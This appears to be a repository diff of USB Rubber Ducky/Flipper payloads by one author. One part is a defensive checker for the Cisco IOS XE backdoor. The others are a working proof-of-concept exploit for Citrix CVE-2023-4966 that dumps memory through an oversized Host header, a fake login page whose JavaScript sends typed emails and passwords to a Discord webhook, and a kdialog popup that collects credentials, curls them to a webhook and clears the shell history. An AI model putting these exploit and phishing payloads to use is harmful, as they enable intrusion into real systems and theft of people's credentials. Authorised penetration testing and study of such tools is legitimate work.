This script can be used to set up a Shell script that allows users of Cisco IOS XE-based systems to periodically check for potential attacks using the recent 0-day vulnerabilities CVE-2023-20198 and CVE-2023-20273.
As of now, patches for these vulnerabilities have not been developed or made available to users. According to analyses conducted by the Fox-IT[[4](#sources)] and VulnCheck[[5](#sources)] teams, it appears that several tens of thousands of devices have already been attacked using these two vulnerabilities.
*Note: Patches for these issues were released over the weekend and are now available to customers via the Cisco software download. [[3](#sources)]*
The severity of these attacks has increased significantly in recent times as cybercriminals have improved their malware's ability to camouflage within the system. Consequently, detecting intrusions has become more challenging.
In response to this, Cisco has released a basic method for users to assess their system's integrity. This involves running a curl command with specific parameters from a Shell on which the Cisco IOS XE system is installed. If the response includes a hexadecimal string (e.g., 0123456789abcdef01), it implies that the machine may have been compromised through the mentioned vulnerabilities.
An immediate solution to the problem is to reboot the system, which would close the backdoor. However, this doesn't mitigate the vulnerabilities in the long term, as the machine remains just as susceptible after the reboot and also why the attacker's super user is not removed. This means that rebooting the system is an immediate measure to block the threat but doesn't provide a lasting mitigation of the threat.
The payload.txt file contains DuckyScript code that enables you to create a Shell script that periodically performs the Cisco-suggested verification to determine if the machine has been attacked. The script defines three variables: the script name, the superuser (sudo) password, and the file path. The only variable that must be modified is the sudo password because it varies from user to user. The other two variables can be changed but aren't strictly necessary for the payload's functionality. They represent the desired script name and the default path (the current folder).
To minimize downtime, the Hak5 Detect Ready extension has been used. When the Shell is opened, the payload executes a series of commands that involve writing the contents of a file, allowing the creation of a script on the machine that will be automatically executed by the operating system.
Once the file is created, it's automatically saved at the end of the execution, and the payload proceeds to enable execution permissions using the permissions granted by the sudo+chmod command.
---
To maintain code readability, I chose to keep a less efficient but more straightforward version as follows:
```
REM Old script
REM STRINGLN sudo chmod +x #SCRIPT-NAME
REM DELAY 500
REM STRINGLN #SUDO-PSWD
REM DELAY 3000
REM STRINGLN sh #PATH-TO-SCRIPT#SCRIPT-NAME $
REM STRINGLN exit
```
This coding style is not optimized since the `DELAY 3000` can vary significantly from one machine to another, making it inherently imprecise.
In order to optimize this code, I prefer the following version, which eliminates the previous waiting and includes only a short delay before entering the sudo password:
```
REM Optimized script
REM Set the script name replacing #SCRIPT-NAME, the default name is auto-check.sh but you can change it here since is used the DuckyScript variable #SCRIPT-NAME.
REM Here you chould define the script path replacing #PATH-TO-SCRIPT, if you don't change it is selected the default path, so the home path. If, for istance, you have a specific path where you put some stuff like this you can edit thi DuckyScript variable with the correct path
STRING sudo chmod +x #SCRIPT-NAME; sh #PATH-TO-SCRIPT#SCRIPT-NAME $; exit
ENTER
DELAY 500
REM Here you must set your sudo password that permit to give the executable permissions to the file
STRING #SUDO-PSWD
ENTER
```
This command concatenates the assignment of execution permissions to the script and proceeds to set up the script for automatic execution every 5 minutes. The Shell is then closed after this operation.
As for the payload of the `curl` command, it has been copied and pasted from the official Cisco source [1].
## Settings
This payload is designed to operate without requiring the installation of third-party software and focuses on performing operations as quickly as possible, as time is a critical factor, as described in the [Consequences](#conseguence) section. The script operates in cycles, with one iteration every 300 seconds, but it is easily adaptable: simply modify the value `sleep 300 # wait time` in the `payload.txt` file to suit your preferences. However, it's important to note that completely removing this entry could generate a high volume of cURL requests, potentially causing issues.
It's crucial to keep in mind that system reboot doesn't fully resolve the problem. Even if the malware is removed, the high-privilege account created by attackers persists even after system reboot.
### Regex
The verification through the execution of the `curl` command involves examining the response of a POST request. If a hexadecimal string is detected within this response, it suggests that the machine may have been compromised using the vulnerabilities in question.
To ensure that the response indeed contains a hexadecimal string, you can use the regular expression (regex) `^[0-9a-zA-Z]+$`. This regex checks for the following criteria:
- `^` The string must start with...
- `[0-9A-Z-a-z]` ... a character that can be a digit from 0 to 9, an uppercase letter from A to Z, or a lowercase letter from a to z;
- `+` There must be at least one of the characters specified within the square brackets...
- `$` ... and the string must end with one of these characters.
Only if the response from the "curl" command contains characters other than hexadecimal ones or no characters at all, the regex will not find any matches, indicating that the machine under scrutiny has not been attacked up to that point.
### Conseguence
When an attack is detected, various actions can be taken. However, it's crucial to keep in mind that the more complex the programmed actions are, the longer the backdoor remains open.
It's important to note that the script, by default, has an approximately 5-minute check interval (300 seconds by default) during which no checks occur. Consequently, the accumulation of time required for various operations following the detection of an attack can increase the exposure time. Therefore, it's essential to carefully consider the actions to implement because adding complexity could negatively impact overall security.
In this scenario, sending a notification at the time of attack detection is suggested. You can customize the code to send an email or create a historical log file containing relevant information. However, it's essential to understand that the only way to definitively close the backdoor is by restarting the system. It's worth noting that a forced restart can carry risks, such as data loss or, in this specific case, the interruption of active connections. The decision to terminate a connection to close the backdoor or keep it open depends on the trade-off between security and operational continuity.
In conclusion, two key factors to consider are response times and the potential risk of data loss. As in any security analysis, the optimal solution depends on what you want to protect and the risks you are willing to accept.
### Administrator Permissions
Administrator privileges are not required to execute the script itself, but they are necessary to ensure that the file containing the script has the required permissions for execution. This type of permission granting is done using the command-line tool `chmod`, which is used to assign specific permissions to the script.
In this specific case, we are using the `-x` parameter, which signifies the execution permission for the script.
## Sources
- [1] Cisco comunication: https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/
- [2] Red Hot Cyber post: https://www.redhotcyber.com/post/37-000-dispositivi-cisco-contengono-backdoor-attenzione-in-quanto-il-malware-ora-risulta-piu-difficile-da-rilevare/
- [3] Patch: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z
- [4] Fox-IT comunication: https://twitter.com/foxit/status/1716472673876730149
- [5] VulnCheck comunication: https://twitter.com/VulnCheckAI/status/1716541908489543725
---
## Credits
<h2 align="center"> Aleff</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Incident_Response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE/assets/1.png
BIN
View File
Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 32 KiB

GNU-Linux/Incident_Response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE/payload.txt
+114
View File
@@ -0,0 +1,114 @@
REM #############################################################################################
REM # #
REM # Title : Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273 #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : incident-response #
REM # Target : Cisco IOS XE #
REM # #
REM #############################################################################################
DELAY 3000
CTRL-ALT t
DELAY 1000
STRING echo 'while true; do
ENTER
DELAY 500
STRING response=$(curl -k -H "Authorization: 0ff4fbf0ecffa77ce8d3852a29263e263838e9bb" -X POST https://systemip/webui/logoutconfirm.html?logon_hash=1)
ENTER
DELAY 500
STRING if [[ $response =~ ^[0-9a-zA-Z]+$ ]]; then
ENTER
DELAY 500
STRING if [ $? -eq 0]; then
ENTER
DELAY 500
STRING # Attack detected, here you decide what to do in this moment
ENTER
DELAY 500
STRING # 1. Send an email to sec-team
ENTER
DELAY 500
STRING # 2. Do some other ops
ENTER
DELAY 500
STRING # ...
ENTER
DELAY 500
STRING # 3. What do you want to do?
ENTER
DELAY 500
STRING # Can you reboot the system or you need to do something else before?
ENTER
DELAY 500
STRING # Do you want to close it?
ENTER
DELAY 500
STRING # ...
ENTER
DELAY 500
STRING # The only one way to close the backdoor is reboot the system, so don t change it (?)...
ENTER
DELAY 500
STRING # |-> See the Conseguence section in README
ENTER
DELAY 500
STRING reboot
ENTER
DELAY 500
STRING else
ENTER
DELAY 500
STRING # You are safe :-)
ENTER
DELAY 500
STRING fi
ENTER
DELAY 500
STRING fi
ENTER
DELAY 500
STRING sleep 300 # wait time
ENTER
DELAY 500
REM Set the script name replacing #SCRIPT-NAME, the default name is auto-check.sh but you can change it here since is used the DuckyScript variable #SCRIPT-NAME.
REM Here you chould define the script path replacing #PATH-TO-SCRIPT, if you don't change it is selected the default path, so the home path. If, for istance, you have a specific path where you put some stuff like this you can edit thi DuckyScript variable with the correct path
STRING done' > #PATH-TO-SCRIPT#SCRIPT-NAME
ENTER
DELAY 500
REM To avoid some bad DELAY I decided to use only one command row
REM Old script
REM STRINGLN sudo chmod +x #SCRIPT-NAME
REM DELAY 500
REM STRINGLN #SUDO-PSWD
REM DELAY 3000
REM STRINGLN sh #PATH-TO-SCRIPT#SCRIPT-NAME $
REM STRINGLN exit
REM Optimized script
REM Set the script name replacing #SCRIPT-NAME, the default name is auto-check.sh but you can change it here since is used the DuckyScript variable #SCRIPT-NAME.
REM Here you chould define the script path replacing #PATH-TO-SCRIPT, if you don't change it is selected the default path, so the home path. If, for istance, you have a specific path where you put some stuff like this you can edit thi DuckyScript variable with the correct path
STRING sudo chmod +x #SCRIPT-NAME; sh #PATH-TO-SCRIPT#SCRIPT-NAME $; exit
ENTER
DELAY 500
REM Here you must set your sudo password that permit to give the executable permissions to the file
STRING #SUDO-PSWD
ENTER
GNU-Linux/Incident_Response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE/script.sh
+26
View File
@@ -0,0 +1,26 @@
#!/bin/bash
while true; do
response=$(curl -k -H "Authorization: 0ff4fbf0ecffa77ce8d3852a29263e263838e9bb" -X POST https://systemip/webui/logoutconfirm.html?logon_hash=1)
if [[ $response =~ ^[0-9a-zA-Z]+$ ]]; then
if [ $? -eq 0]; then
# Attack detected, here you decide what to do in this moment
# 1. Send an email to sec-team
# TODO
# 2. Do some other ops like save some log information somewhere or save before stop the process
# ...
# 3. What do you want to do?
# Can you reboot the system or you need to do something else before?
# Do you want to close it?
# ...
# The only one way to close the backdoor is reboot the system, so don t change it (?)...
# |-> See the Conseguence section in README
reboot
else
# You are safe :-)
fi
fi
sleep 300 # wait time
done
GNU-Linux/Incident_Response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/README.md
+200
View File
@@ -0,0 +1,200 @@
# Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966
This payload sends an HTTP request to a remote server using the `curl` command. If the request succeeds, it means the exploit was successful. Conversely, if the request fails, it indicates that the target has resisted the attack.
This payload is a Proof of Concept (POC) based on DuckyScript and is intended for use only in authorized penetration testing. CVE-2023-4966 [[1](#sources)] has been resolved, and I have decided to release this payload only now to minimize the risk of it being used inappropriately. Please use this payload exclusively when you are fully aware of what you are doing and have obtained explicit authorization from the target.
**Category**: incident-response
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Index
- [Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966](#exploit-citrix-netscaler-adc-and-gateway-through-cve-2023-4966)
- [CVE-2023-4966](#cve-2023-4966)
- [Summary](#summary)
- [Impacted Products](#impacted-products)
- [Settings](#settings)
- [DuckyScript Extensions Used](#duckyScript-extensions-used)
- [Payload Description Windows](#payload-description-windows)
- [Payload Description Linux](#payload-description-linux)
- [Script.sh](#script-sh)
- [Sources](#sources)
- [Credits](#credits)
## CVE-2023-4966
Multiple vulnerabilities have been discovered in NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway).
### Summary
NetScaler ADC and NetScaler Gateway contain unauthenticated buffer-related vulnerabilities mentioned below
### Impacted Products
The following supported versions of NetScaler ADC and NetScaler Gateway are affected by the vulnerabilities:
- NetScaler ADC and NetScaler Gateway14.1before14.1-8.50
- NetScaler ADC and NetScaler Gateway13.1before13.1-49.15
- NetScaler ADC and NetScaler Gateway13.0before 13.0-92.19
- NetScaler ADC 13.1-FIPS before 13.1-37.164
- NetScaler ADC 12.1-FIPS before 12.1-55.300
- NetScaler ADC 12.1-NDcPP before 12.1-55.300
***Note**: NetScaler ADC and NetScaler Gateway version 12.1 is now End-of-Life (EOL) and is vulnerable.*
This bulletin only applies to customer-managed NetScaler ADC and NetScaler Gateway products. Customers using Citrix-managed cloud services or Citrix-managed Adaptive Authentication do not need to take any action.
![](./assets/1.png)
***Source**: The information was acquired from the official website of [support.citrix.com](#sources).*
## Settings
The sole configuration parameter that requires modification is the hostname, which represents the IP address (without protocol) of the target Citrix ADC / Gateway machine, such as 192.168.1.200. To configure this setting, you need to edit the "payload.txt" file to specify the desired address.
```DuckyScript
* REM Replace #HOSTNAME with your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
QUACK STRING $uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration"
```
## Payload Description Windows [_Go to the Windows version_](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Incident_Response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966)
In this line, a variable named `$header_value` is created, containing a string of 24576 'a' characters. This variable represents the value to be used in the HTTP header.
```powershell
$header_value = 'a' * 24576
```
Here, all newline characters ("\n") are removed from the string stored in `$header_value`. This is done to ensure that the string doesn't contain any line break characters.
```powershell
$header_value = $header_value -replace "\n", ""
```
A variable `$headers` is created, which holds an HTTP header formatted as a string. This header will be used in the subsequent HTTP request.
```powershell
$headers = "-H 'Host:$header_value'"
```
Here, a variable `$headers` is created as a hashtable containing the HTTP header. In this case, only the "Host" header is used, with the value from `$header_value`.
```powershell
$headers = @{ 'Host' = $header_value }
```
This line defines the variable `$uri`, which contains the target URL for the HTTP request. Note that "#HOSTNAME" is a DuckyScript variable that should be replaced with the actual value before executing the script (see the [Settings](#settings) section).
```powershell
$uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration"
```
Here, the HTTP request to the specified URL is executed using the GET method and with the headers defined in the `$headers` variable. The result of the request is stored in the `$response` variable.
```powershell
$response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10
```
This `if` statement checks if the first three characters of the HTTP response in the `$response` variable are equal to "200," indicating a successful HTTP response.
```powershell
if ($response.Substring(0, 3) -eq "200")
```
If the preceding condition is true, some messages are printed to indicate the beginning of the output.
```powershell
Write-Host "--- Dumped memory ---"
$response.Substring(131050)
Write-Host "--- End ---"
```
If the initial condition of the `if` statement is not met, a message is printed, indicating that the machine is not vulnerable.
```powershell
Write-Host "Could not dump memory"
```
## Payload Description Linux
This line sets the `header_value` variable to a string containing 24,576 'a' characters. It uses the `yes` command to repeatedly output 'a' and `head` to limit it to 24,576 lines. The `tr` command is used to remove any newline characters, resulting in a long string of 'a's.
```bash
header_value=$(yes a | head -n 24576 | tr -d '\n')
```
Here, the `headers` variable is constructed with the `-H` option for the cURL command. It sets the 'Host' header to the previously generated `header_value`.
```bash
headers="-H 'Host:$header_value'"
```
This line uses cURL to send a request to the specified URL with the constructed `headers`. The `-s` flag suppresses progress meter and error messages, while the `-k` flag allows cURL to perform an insecure SSL connection. The `--connect-timeout 10` flag sets a connection timeout of 10 seconds. The response is stored in the `response` variable.
```bash
response=$(curl -s -k -H "$headers" "https://$hostname/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
```
In this block, it checks if the exit status of the cURL command is 0 (indicating a successful request) and if the first three characters of the response are "200" (HTTP success code). If both conditions are met, it prints `--- Dumped memory ---`, followed by a portion of the response starting from character 131,051, and then indicates that the hostname is vulnerable. If the conditions are not met, it prints `Could not dump memory`.
```bash
if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
echo "--- Dumped memory ---"
echo "$response" | cut -c 131051-
echo "The #HOSTNAME is vulnerable!"
echo "--- End ---"
else
echo "Could not dump memory"
fi
```
## Script sh
The script.sh script accepts one parameter, which should be the target hostname without the application of a protocol (e.g., `192.168.1.200`). It uses this parameter to perform a specific action in the exploit.
Example Execution:
```shell
./script.sh 192.168.1.200
```
Before running the script, you might need to grant execute permissions to the file, as mentioned. You can do this with the following command:
```shell
sudo chmod +x script.sh
```
After assigning execute permissions, the above command allows the user to run the script without having to specify the sh command before the script's name.
## Sources
- [1] Official source of information acquisition: https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967
- [2] Detect Rady: https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
- [3] Passive Windows Detect: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
- [4] Red Hot Cyber post: https://www.redhotcyber.com/post/e-pubblico-lexploit-per-il-bug-critico-di-citrix-netscaler-adc-e-gateway-scopriamo-come-funziona/
## Credits
<h2 align="center"> Aleff</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Incident_Response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/assets/1.png
BIN
View File
Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 61 KiB

GNU-Linux/Incident_Response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt
+48
View File
@@ -0,0 +1,48 @@
REM ####################################################################################
REM # #
REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : incident-response #
REM # Target : Citrix NetScaler ADV; NetScaler Gateway #
REM # #
REM ####################################################################################
REM GNU/Linux Version
DELAY 3000
CTRL-ALT t
DELAY 1000
STRING header_value=$(yes a | head -n 24576 | tr -d '\n')
ENTER
DELAY 500
STRING headers="-H 'Host:$header_value'"
ENTER
DELAY 500
REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
STRING response=$(curl -s -k -H "$headers" "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
ENTER
DELAY 500
STRING if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
ENTER
DELAY 500
STRING echo "--- Dumped memory ---"
ENTER
DELAY 500
STRING echo "$response" | cut -c 131051-
ENTER
DELAY 500
STRING echo "--- End ---"
ENTER
DELAY 500
STRING else
ENTER
DELAY 500
STRING echo "Could not dump memory"
ENTER
DELAY 500
STRING fi
ENTER
GNU-Linux/Incident_Response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/script.sh
+17
View File
@@ -0,0 +1,17 @@
#!/bin/bash
hostname="$1" # first parameter
header_value=$(yes a | head -n 24576 | tr -d '\n')
headers="-H 'Host:$header_value'"
response=$(curl -s -k -H "$headers" "https://$hostname/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
echo "--- Dumped memory ---"
echo "$response" | cut -c 131051-
echo "--- End ---"
else
echo "Could not dump memory"
fi
GNU-Linux/Phishing/StandardPhishingAttack_Linux/README.md
+51
View File
@@ -0,0 +1,51 @@
# Standard Phishing Attack - Linux ✅
A script used to exfiltrate the Standard username and password by a phishing attack.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Phishing
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to exfiltrate the Standard username and password by a phishing attack.
Opens a shell, create a tmp directory that will be deleted in 3600 seconds, move into the directory, download your own zip, unzip it, open the login page and close the shell.
## Getting Started
### Dependencies
* Internet Connection
### Settings
* Set the Discord wehbook (or whatever you want) into the login.js file at line 3
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Phishing/StandardPhishingAttack_Linux/login.html
+34
View File
@@ -0,0 +1,34 @@
<!DOCTYPE html>
<html>
<head>
<title>Form di Login con Bootstrap</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
</head>
<body>
<div class="container">
<h2>Special and super secure login</h2>
<form onsubmit="send_login(); return false;" method="post">
<div class="form-group">
<label for="email">Email:</label>
<input type="email" class="form-control" id="email" placeholder="Insert your email">
</div>
<div class="form-group">
<label for="password">Password:</label>
<input type="password" class="form-control" id="password" placeholder="Insert your password">
</div>
<div class="form-check">
<label class="form-check-label">
<input type="checkbox" class="form-check-input"> Remember me
</label>
</div>
<button type="submit" class="btn btn-primary">Login</button>
</form>
</div>
</body>
<script src="script.js"></script>
</html>
GNU-Linux/Phishing/StandardPhishingAttack_Linux/payload.txt
+56
View File
@@ -0,0 +1,56 @@
REM ###########################################
REM # |
REM # Title : Standard Phishing Attack |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Phishing |
REM # Target : Linux |
REM # |
REM ###########################################
REM Requirements:
REM - Internet Connection
REM REQUIRED - Replace example.com/file.zip with your own ZIP link. The zip should contian the files ['login.html', 'script.js']
DEFINE ZIP_LINK example.com/file.zip
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### Main SECTION ####
REM Create a random directory
STRING dir_name=$(mktemp -d)
ENTER
DELAY 500
REM Delete the directory after 60 minutes (3600 seconds)
STRING (sleep 3600 && rm -rf $dir_name) &
ENTER
DELAY 500
REM Move into the directory
STRING cd $dir_name
ENTER
DELAY 500
REM Downloa the zip from your own link
STRING curl -LOk "
STRING ZIP_LINK
STRING "
ENTER
DELAY 500
REM Unzip it
STRING unzip file.zip
ENTER
DELAY 500
REM Open the login page
STRING xdg-open login.html; exit;
ENTER
GNU-Linux/Phishing/StandardPhishingAttack_Linux/script.js
+32
View File
@@ -0,0 +1,32 @@
async function send_login() {
// SET YOUR DISCORD WEBHOOK or whatever you want to exfiltrate the data
const discord_webhook_url = "https://discord.com/api/webhooks/123/abc";
// Retrieve data from POST form
const email = document.getElementById('email').value;
const password = document.getElementById('password').value;
// Create message content
const message = "Email: " + email + " \n " + "Password: " + password;
try {
// Send POST request to Discord webhook URL
const response = await fetch(discord_webhook_url, {
method: "POST",
headers: {
"Content-Type": "application/json"
},
body: JSON.stringify({ content: message })
});
if (response.ok) {
window.location.href = "https://www.example.com";
} else {
// Otherwise, throw a generic error
throw new Error('Generic error!');
}
} catch (error) {
// Log any errors to the console
console.error(error);
}
}
GNU-Linux/Phishing/StandardPhishingPayloadUsingKdialog_Linux/README.md
+89
View File
@@ -0,0 +1,89 @@
# Standard Phishing Payload Using kdialog - Linux ✅
A script used to exfiltrate some input by a popup phishing based on linux systems using kdialog.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Phishing
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to exfiltrate some input by a popup phishing based on linux systems using kdialog.
Opens a shell, get the data by a popup, send the input to a Discord webhook (or whatever you want to use for the exfiltration).
## Getting Started
### Dependencies
* Internet Connection for the Exfiltration
### Settings
* Set the Discord webhook
* Set the payload as you want
### cURL Command
With this payload you can send a post message using cURL shell command line to the webhook or whatever you choose for the exfiltration. You should replace the tag *\<message>* with the user input.
- `curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(<message>)\"}" $WEBHOOK_URL);`
### kdialog - Popup command
KDialog can be used to show nice dialog boxes from shell scripts. You can't acquire multiple input in one popup, so you should use multiple popup. You can set the title, the message, the input type and so and so on...
- Simple message popup: `kdialog --title "<replace_with_your_title>" --msgbox "<replace_with_your_message>"; `
- Plaintext input popup (i.e. Username): `kdialog --title "<input_title>" --inputbox "<input_type_title>";`
- Hiddentext input popup (i.e. Password): `kdialog --title "<input_title>" --password "<input_type_title>" --default "password";`
### The Payload
The payload will merge the cURL command with the kdialog popup output (so the user input) as the following command...
```shell
$(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(kdialog --title "Popup Title" --msgbox "Insert your username and password for go on"; kdialog --title "Insert your Username" --inputbox "Username"; kdialog --title "Insert your Password" --password "Password" --default "password";)\"}" $WEBHOOK_URL);
```
You can put into the payload something that will clear the last shell history closing the shell at the end of the execution, adding this line `history -c; exit;`
```shell
$(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(kdialog --title "Popup Title" --msgbox "Insert your username and password for go on"; kdialog --title "Insert your Username" --inputbox "Username"; kdialog --title "Insert your Password" --password "Password" --default "password";)\"}" $WEBHOOK_URL); history -c; exit;
```
### FAQs
- Why put the entire payload in one line?
Generally it is recommended to divide the various steps at different times by dividing each command with some DELAY, in this case it is not recommended because phishing-type cyber attacks often tend to take a long time. How can you tell how long a user should take to enter their data? What if he doesn't remember his email? It is important to consider the slow factor, which, in theory, can take really long and in any case cannot be dynamically predicted.
- Why is used the 'cyber-attack' word?
This payload is intended to be a working tool for performing cybersecurity analysis and is not intended to harm malicious users in any way. This term is used for simplicity in speaking but is really meant to be a study tool that can be worked on.
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Phishing/StandardPhishingPayloadUsingKdialog_Linux/payload.txt
+54
View File
@@ -0,0 +1,54 @@
REM ##########################################################
REM # |
REM # Title : Standard Phishing Payload Using kdialog |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Phishing |
REM # Target : Linux |
REM # |
REM ##########################################################
REM Requirements:
REM - EXFILTRATION:
REM - Internet Connection
REM - Discord webhook for example, but you can use whatever you want for the exfiltration (i.e. smtp e-mail, Dropbox, Telegram and so on..)
REM - PHISHING:
REM - This payload is usable on the Linux system where is installed 'kdialog', but you can use whatever you want for simulate the popup with the intent to take the input
REM - It is important that the popup payload occurs in a single line so that the traces of data collection are eliminated immediately after submission. This is precisely why you can see the REMed code to get a good understanding of what it is all about.
REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks/<webhook_id>/<token>
DEFINE WEBHOOK example.com
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### Phishing ####
STRING WEBHOOK_URL="
STRING WEBHOOK
STRING "
ENTER
DELAY 500
REM A short and efficient cURL command to send an HTTP POST request to a webhook URL with JSON data in the request body.
STRING $(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(
REM A compact command that uses kdialog to display a popup message prompting (into the curl content section) the user to enter their username and password to proceed. You can't acquire multiple input in one popup, so you should use multiple popup, as i wrote here.
REM You can set the title, the message, the input type and so and so on...
STRING kdialog --title "Popup Title" --msgbox "Insert your username and password for go on";
STRING kdialog --title "Insert your Username" --inputbox "Username";
STRING kdialog --title "Insert your Password" --password "Password" --default "password";
REM The end part of the curl payload...
STRING )\"}" $WEBHOOK_URL);
REM history -c will clear the last shell history and the exit command will close the popup at the end of the execution
STRING history -c; exit;
REM All-In-One doesn't need delay time
ENTER
GNU-Linux/Prank/ChangeDesktopWallpaper_LinuxKDE/README.md
+59
View File
@@ -0,0 +1,59 @@
# Change Desktop Wallpaper - Linux/KDE ✅
A script used to prank your friends changing their desktop wallpaper.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Prank
## Disclaimer
<div align=center>
